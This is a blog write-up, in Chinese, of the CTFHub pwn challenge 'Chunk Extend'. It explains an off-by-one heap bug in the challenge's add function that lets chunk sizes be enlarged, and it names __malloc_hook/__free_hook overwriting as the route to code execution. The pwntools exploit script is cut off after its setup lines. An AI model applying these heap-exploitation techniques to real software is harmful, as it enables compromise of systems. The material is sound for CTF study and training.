CTFHub技能树---pwn-Chunk Extend

该文章详细描述了一个利用堆溢出漏洞来操控内存的场景。通过在CTF挑战中远程连接到一个服务,作者演示了如何通过添加和释放特定大小的chunk,然后编辑堆块大小和内容,导致index0的堆块溢出,进而修改其他chunk的size。最终,通过操纵`__malloc_hook`和`__free_hook`,实现了代码执行,展示了底层内存管理的安全风险和技术利用方法。

漏洞点

在这里插入图片描述
add这里如果 index 0 ~ 9 都申请了的 chunk ,那么 i = 10 再退出 for 循环,但是还会接下去利用 ptr[10] = malloc(ptr[20]) 申请chunk,实现 index 0 的堆块溢出
也就是add 可以覆盖掉一个第一个 chunk 的 size
最后第11个chunk的size会变成非常大,编辑chunk0,就可以实现溢出

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./chunk_extend"
io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",30492)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.27.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

saulgoodman-q

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值